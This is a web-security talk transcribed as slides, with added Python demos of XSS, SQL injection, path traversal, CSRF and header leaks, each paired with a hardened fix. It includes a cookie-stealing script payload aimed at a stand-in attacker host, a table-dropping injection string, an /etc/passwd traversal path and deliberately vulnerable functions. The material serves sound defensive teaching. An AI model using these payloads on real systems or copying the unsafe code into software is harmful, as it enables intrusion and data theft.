Description: Basic security concepts for web applications and web sites for today's environment. Server Configuration, Site Configuration, Best Practices, and Passwords.

Page 1: Modern Web Security

Bill Condo / @mavrck

Modern Web Security: Attacks & Improvements

4/2/2014 | Dayton Web Developers

Page 2: Modern Web Security

Who here is responsible for a website?

Page 3: Modern Web Security

Who here has published code updates live in the last month?

Page 4: Modern Web Security

Are they secure?

Page 5: Modern Web Security

What We’ll Cover

• Common Threats

• Easy Improvements

• Bonus: Passwords

Page 6: Modern Web Security

Common Threats

• Cross Site Scripting

• SQL Injection

• Path Disclosure

• Cross Site Request Forgery

• Information Disclosure

Page 7: Modern Web Security

• Denial of Service

• Code Execution

• Memory Corruption

• Arbitrary File

• Local File Include

• Remote File Include

• Buffer Overflow

Page 8: Modern Web Security

Cross-site scripting (XSS)

• In a nutshell: a website that lets attacker-supplied script be sent back in a response to a user's browser, where it runs with the site's own origin.

• Typically this is JavaScript inserted into a query string or form field that the site echoes into the page without encoding it.

• The script can read cookies and session tokens, make requests as the user, and exfiltrate sensitive data.
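An added example of the reflected XSS described above, written for this page and not taken from the slides: a search page that echoes its q parameter. The page, the attacker payload and the evil.example host are constructed for the demo; the fix is output encoding for the context the value lands in (html.escape here, htmlspecialchars($s, ENT_QUOTES) in PHP).

```python
import html
from urllib.parse import parse_qs, quote

# Constructed attacker payload: what an attacker would put in the `q` query
# parameter of a search page that echoes the term back. It closes the value
# attribute, then injects a script that ships document.cookie off-site.
PAYLOAD = '"><script>document.location="http://evil.example/?c="+document.cookie</script>'
ATTACK_QUERY = "q=" + quote(PAYLOAD)


def search_term(query_string: str) -> str:
    """Pull the `q` parameter out of a raw query string (URL-decoded)."""
    return parse_qs(query_string).get("q", [""])[0]


def render_unsafe(query_string: str) -> str:
    """Vulnerable: the user's search term is copied straight into the HTML.
    The payload closes the <input> tag and its <script> then runs in the
    page's origin, with access to the user's cookies."""
    q = search_term(query_string)
    return f'<input name="q" value="{q}">\n<p>Results for {q}</p>'


def render_safe(query_string: str) -> str:
    """Hardened: every untrusted value is HTML-encoded for the context it is
    written into. html.escape(quote=True) turns & < > " ' into entities, so
    the term can neither close the attribute nor open a new tag; the browser
    shows the payload as text instead of executing it."""
    q = html.escape(search_term(query_string), quote=True)
    return f'<input name="q" value="{q}">\n<p>Results for {q}</p>'


def contains_live_script(page: str) -> bool:
    """Crude detector used for the demo: is there an unencoded <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("unsafe page:\n" + render_unsafe(ATTACK_QUERY))
    print("\nsafe page:\n" + render_safe(ATTACK_QUERY))
```

Encoding has to match the output context: html.escape covers HTML text and quoted attributes, but a value written into a URL, a JavaScript string or a CSS block needs that context's encoder instead.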

Page 9: Modern Web Security

SQL Injection

• Allowing user input to be inserted directly into database queries, which lets an attacker change the meaning of the query: unexpected data, database corruption and data leakage.

• (original) statement = "SELECT * FROM users WHERE id ='" + id + "';"

• (input) 0'; DROP TABLE users; --

• (final) statement = "SELECT * FROM users WHERE id ='0'; DROP TABLE users; --';"
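An added example of the injection above and its fix, written for this page (not the slides' code) against an in-memory SQLite database constructed for the demo. The concatenation is the slide's; the hardened version binds the value as a parameter, which is what PDO prepared statements or mysqli bind_param do in PHP.

```python
import sqlite3


def fresh_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the site's users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, is_admin INTEGER NOT NULL);
        INSERT INTO users VALUES (1, 'bill', 1);
        INSERT INTO users VALUES (2, 'brad', 0);
        """
    )
    return conn


def table_exists(conn: sqlite3.Connection, table: str = "users") -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None


def lookup_unsafe(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable: the slide's pattern. A quote in the input ends the string
    literal and the rest of the input is parsed as SQL."""
    statement = "SELECT name FROM users WHERE id ='" + user_id + "' ORDER BY id;"
    return [name for (name,) in conn.execute(statement)]


def drop_table_unsafe(conn: sqlite3.Connection, user_id: str) -> None:
    """Same concatenation, run through an API that accepts several statements
    (executescript here; many drivers, and PHP's mysqli_multi_query, do the same).
    This is what turns the slide's  0'; DROP TABLE users; --  input into data loss."""
    statement = "SELECT * FROM users WHERE id ='" + user_id + "';"
    conn.executescript(statement)


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened: a prepared statement with a bound parameter. The input reaches
    the engine as a value and is never parsed as SQL, so a quote is just a quote."""
    rows = conn.execute("SELECT name FROM users WHERE id = ? ORDER BY id", (user_id,))
    return [name for (name,) in rows]


if __name__ == "__main__":
    db = fresh_db()
    print(lookup_unsafe(db, "' OR '1'='1"))   # every user leaks
    print(lookup_safe(db, "' OR '1'='1"))     # nothing: the value is compared literally
    drop_table_unsafe(db, "0'; DROP TABLE users; --")
    print(table_exists(db))                   # table is gone
```

Parameters only protect values. Table and column names, ORDER BY targets and LIMIT clauses cannot be bound, so those must come from an allowlist in code rather than from the request.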

Page 10: Modern Web Security

http://xkcd.com/327/

Page 11: Modern Web Security

Path Disclosure

• Allowing an attacker to learn the filesystem path to the web root, e.g. /home/site.com/public/index.php (typically leaked through an error message or stack trace).

• On its own this is a small leak, but it is a nugget of knowledge that combines with other bugs: paired with a page-include parameter that is not validated, it lets the attacker point the include at specific private files and work toward full access.

• http://site.com/index.php?page=about

• http://site.com/index.php?page=../config
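An added example, written for this page, of how the ?page= parameter in the URLs above should be resolved. The pages directory is a hypothetical path and Python stands in for the PHP include; the two checks (an allowlist on the name, then a containment check on the resolved real path) are the technique.

```python
import os
import re
from typing import Optional

# Assumption for the example: page templates live in a directory outside the
# public web root. The path is hypothetical.
PAGES_DIR = "/home/site.com/pages"

# Allowlist: a page name is a single path component of lower-case letters,
# digits, dashes and underscores. No slashes and no dots, so "../config" is
# refused before the filesystem is consulted at all.
PAGE_NAME = re.compile(r"[a-z0-9_-]{1,64}")


def is_safe_page_name(page: str) -> bool:
    return PAGE_NAME.fullmatch(page) is not None


def resolve_page(page: str, pages_dir: str = PAGES_DIR) -> Optional[str]:
    """Map the ?page= value to the file to include, or None if it must be refused.

    Two independent layers: the allowlist above, then a check that the resolved
    absolute path is still inside pages_dir (defence in depth, in case the
    allowlist is loosened later). realpath() normalises '..' and follows
    symlinks, so the comparison is on the real location of both paths."""
    if not is_safe_page_name(page):
        return None
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def resolve_page_unsafe(page: str, pages_dir: str = PAGES_DIR) -> str:
    """The vulnerable behaviour the slide's URLs exploit: the parameter is joined
    to the directory with no validation, so '..' walks out of it."""
    return os.path.normpath(os.path.join(pages_dir, page + ".php"))


if __name__ == "__main__":
    for p in ["about", "../config", "about/../../config", "../../../../etc/passwd"]:
        print(f"{p!r:32} unsafe -> {resolve_page_unsafe(p)}  safe -> {resolve_page(p)}")
```

The same containment check applies to any user-influenced file path (downloads, templates, log viewers); the disclosed web-root path is exactly what makes the attacker's ../ offsets reliable.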

Page 12: Modern Web Security

Cross Site Request Forgery (CSRF)

• Tricks an authenticated user's browser into sending a request the user did not intend, for example by loading a URL from an attacker's page. The site accepts it because the browser attaches the session cookie automatically. This is common in state-changing features driven by URL parameters that have no per-request verification (such as a CSRF token).

• http://site.com/send-message.php?from=bill&to=brad&message=hi

• May also be triggered by malicious code injected into the site's own pages (for example via XSS), which can also read the CSRF token.
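An added example, written for this page, of hardening the send-message endpoint above. The request objects, session store and secret key are constructed stand-ins; the technique is a synchronizer token bound to the session with an HMAC, plus refusing GET for state changes and taking the sender from the session instead of the from= parameter.

```python
import hashlib
import hmac
import secrets

# Assumptions for the example: a per-deployment secret and an in-memory session
# store. Both are constructed here; a real app keeps them server-side.
SECRET_KEY = secrets.token_bytes(32)
SESSIONS = {"sess-bill": "bill"}  # session cookie value -> logged-in user


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(secret, session id).
    It goes into the form as a hidden field. An attacker's page on another
    origin can make the browser send the cookie, but cannot read this value."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token: str) -> bool:
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected, token or "")  # constant-time compare


def handle_send_message(request: dict) -> tuple:
    """send-message.php, hardened. `request` is a constructed stand-in with the
    keys method, cookies and form. Returns (status, body)."""
    if request["method"] != "POST":
        return 405, "state-changing actions must be POST, not a GET anyone can link to"
    session_id = request["cookies"].get("session")
    sender = SESSIONS.get(session_id)
    if sender is None:
        return 401, "not logged in"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    # The sender comes from the session, never from a from= parameter.
    to = request["form"].get("to", "")
    message = request["form"].get("message", "")
    return 200, f"{sender} -> {to}: {message}"


def forged_request_via_url() -> dict:
    """The slide's attack: a GET the victim's browser is made to load."""
    return {"method": "GET", "cookies": {"session": "sess-bill"},
            "form": {"from": "bill", "to": "brad", "message": "hi"}}


def forged_request_via_form() -> dict:
    """An auto-submitting cross-site POST form. The cookie rides along, the
    token does not, because the attacker never sees it."""
    return {"method": "POST", "cookies": {"session": "sess-bill"},
            "form": {"to": "brad", "message": "hi"}}


def legitimate_request() -> dict:
    return {"method": "POST", "cookies": {"session": "sess-bill"},
            "form": {"to": "brad", "message": "hi",
                     "csrf_token": issue_csrf_token("sess-bill")}}
```

As a second layer, set the session cookie with the SameSite=Lax (or Strict) attribute so browsers that support it do not attach the cookie to cross-site POSTs in the first place; the token check still matters for older browsers and for subdomains you do not control.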

Page 13: Modern Web Security

Information Disclosure

• Releasing sensitive information into an untrusted environment. This can be the operating environment, customer data, or trade secrets.

• Path that the website runs at, database info, service versions, etc.

• Credit card data, private account info (address, phone), and customer history.

• Business logic, processes, and long-term business plans.

Page 16: Modern Web Security

Easy Improvements

• Secure Your Environment

• Secure Your Website

• Establish Audits

Page 17: Modern Web Security

Secure your Environment

• Leave your cheap shared web host (BlueHost, GoDaddy, etc.) and move to a Virtual Private Server (VPS) such as Digital Ocean, Linode, Rackspace, AWS, etc. On shared hosting you share the security posture of every other tenant on the box.

• Turn off the display of errors and debugging info in production, and send them to log files instead.

• Turn on automatic updates for security patches.

• Turn off broadcasting of service versions and extensions (server banners, X-Powered-By headers).

• Turn off modules that aren't required.
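An added check, written for this page, for the two leaks the list above tells you to close: version banners and on-screen errors. The two HTTP responses are constructed samples (the chatty one is what a stock LAMP box looks like, the quiet one is the same box after setting Apache's ServerTokens Prod and ServerSignature Off, PHP's expose_php = Off, display_errors = Off and log_errors = On; nginx's equivalent is server_tokens off;). The audit function is mine, not a tool the slides mention.

```python
import re

# Constructed HTTP responses: one from a host that broadcasts versions and shows
# errors, one after the configuration fixes. Header names are case-insensitive.
CHATTY_RESPONSE = {
    "status": 200,
    "headers": {
        "Server": "Apache/2.2.22 (Ubuntu) PHP/5.3.10-1ubuntu3.4",
        "X-Powered-By": "PHP/5.3.10-1ubuntu3.4",
        "Content-Type": "text/html",
    },
    "body": "<b>Warning</b>: mysql_connect(): Access denied for user 'site'@'localhost' "
            "in <b>/home/site.com/public/config.php</b> on line <b>12</b>",
}
QUIET_RESPONSE = {
    "status": 500,
    "headers": {"Server": "Apache", "Content-Type": "text/html"},
    "body": "<h1>Something went wrong</h1><p>Reference 7f3a</p>",
}

VERSION_RE = re.compile(r"\d+\.\d+")
# PHP's default error output: "<level>: <message> in <file> on line <n>",
# with or without the <b> tags that html_errors adds.
PHP_ERROR_RE = re.compile(
    r"(Warning|Notice|Fatal error|Parse error|Deprecated)(</b>)?:.*? in (<b>)?(/[^<\s]+)",
    re.S,
)


def audit_response(response: dict) -> list:
    """Return the information leaks found in one response, as short findings."""
    findings = []
    headers = {k.lower(): v for k, v in response["headers"].items()}
    server = headers.get("server", "")
    if VERSION_RE.search(server):
        findings.append(f"Server header reveals versions: {server}")
    for h in ("x-powered-by", "x-aspnet-version", "x-aspnetmvc-version"):
        if h in headers:
            findings.append(f"{h} header reveals the stack: {headers[h]}")
    m = PHP_ERROR_RE.search(response["body"])
    if m:
        findings.append(f"error message leaks server path: {m.group(4)}")
    return findings


if __name__ == "__main__":
    for label, resp in (("before", CHATTY_RESPONSE), ("after", QUIET_RESPONSE)):
        print(label, audit_response(resp) or "no leaks found")
```

Run it against real responses (for example from a scripted request that deliberately triggers an error page) after each deployment; the path finding is the same leak the Path Disclosure slide describes.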

Page 18: Modern Web Security

Sorry, We’re Not Sharing Security…

Page 19: Modern Web Security

Thanks for letting me know…

Page 20: Modern Web Security

Secure Your Website

• Validate and sanitize user input. Always. Encode output for the context it lands in (HTML, attribute, URL, SQL).

• Escape database query parameters. Better yet, use an established package with prepared statements so the data never becomes part of the SQL text.

• Store sensitive data outside of the webroot with proper permissions.

• SSL/TLS where possible.

• Sandbox user uploads and treat them with suspicion.

Page 21: Modern Web Security

Establish Audits

• Black Box: Security/Vulnerability Scanners, Penetration Tests

• White Box: Source Code Analyzers, Code Tests

• Password Testing

Page 22: Modern Web Security

More Security Info

• http://www.webappsec.org

• http://www.owasp.org

Page 23: Modern Web Security

Stretch. Last-minute bucket. We're in overtime.

Page 24: Modern Web Security

Bonus: Password Security

• Terminology

• Landscape/Problems

• Best Practices

• Getting Policy Buy-in

Page 25: Modern Web Security

Password Terminology

• Encrypting - The process of encoding messages or information in such a way that only authorized parties can read it*. Encryption uses a key and is reversible (two-way): whoever holds the key can decrypt, which is why it is the wrong tool for storing passwords.

• Hashing - Password hashing is a one-way conversion of an input into a fixed-length representative string. (i.e. nothing = 4fhk348fhsk48rfk4d3)

• Salting - A unique random string (one per user) stored alongside the hash. It keeps the hashes different for users who share the same password and defeats precomputed lookup tables.

*http://en.wikipedia.org/wiki/Encryption

Page 26: Modern Web Security

• Entropy (Strength) - A measure of the uncertainty associated with a random variable. (i.e. Password Strength)

• Rainbow Tables - Precomputed lookup tables that map hash outputs back to inputs for a known hash algorithm; they only work against unsalted hashes.

Page 27: Modern Web Security

http://xkcd.com/936/

Page 28: Modern Web Security

Problems

Page 29: Modern Web Security

State of Passwords

• Most people share passwords between sites

• Most people don't use secure passwords

• Secure passwords with high entropy are impossible to remember

• Most people don’t use a password manager

Page 30: Modern Web Security

Lack of Transparency

• Web apps and sites don't disclose their password policies or hashing strength, and there isn't a standards body to police who's following best practices and who's being risky.

• Users often don't find out what data was compromised in an attack, and frequently don't find out about a breach at all until it reaches the news cycle.

Page 31: Modern Web Security

Forgotten Trail

• With e-commerce, we often have to create an account, provide payment details, and then may never shop there again. However, the data persists.

• Users typically don’t keep a master list of sites they have an account on, or have purchased from. Each account can act as a nugget of knowledge, slowly building up to enough data for concern.

Page 32: Modern Web Security

Best Practices / Worst Practices

Page 33: Modern Web Security

Don't help the enemy

• Don't: Policies that enforce things such as "first character must be upper case" and "must end in a special character". They hand the attacker a mask to crack against.

• Don't: To an extent, disclosing the minimum required counts of lower case, upper case, numeric, and special characters; it shrinks the search space.

Page 34: Modern Web Security

Garbage in, garbage out

• Don't: Have no password policy at all.

• Don't: Allow common passwords like 'password' and '123456'.

• Don't: Allow common dictionary words.

Page 35: Modern Web Security

Getting Policy Buy-in

Page 36: Modern Web Security

#1 Prevent PR Issues

Page 37: Modern Web Security

#2 Cost vs Risk

• Doing security correctly is less expensive up front. The opportunity cost is minimal compared to the reduction in risk: expected cost = cost of an incident × likelihood of an incident.

• What does it cost to clean up the mess: reset the passwords, scan the servers, added support calls/requests, etc.

• What does it cost to cleanup the mess: reset the passwords, scan the servers, added support calls/requests, etc…

Page 38: Modern Web Security

#3 Predictability

• Help project/business managers minimize unexpected security-response events.

• Better understand how your week is going to go.

Page 40: Modern Web Security

My Ask of You

• If you found this information useful, I ask two things of you:

• Follow me Twitter for development tips: @mavrck

• Back the Salt Mines Device Lab fundraiser for $1+: http://igg.me/p/728005

• Also, we’re hiring at LMG. Grab a card if you’re currently not next to your boss (otherwise email [email protected]).

Page 41: Modern Web Security

Roaring Applause Here. Thanks for your time.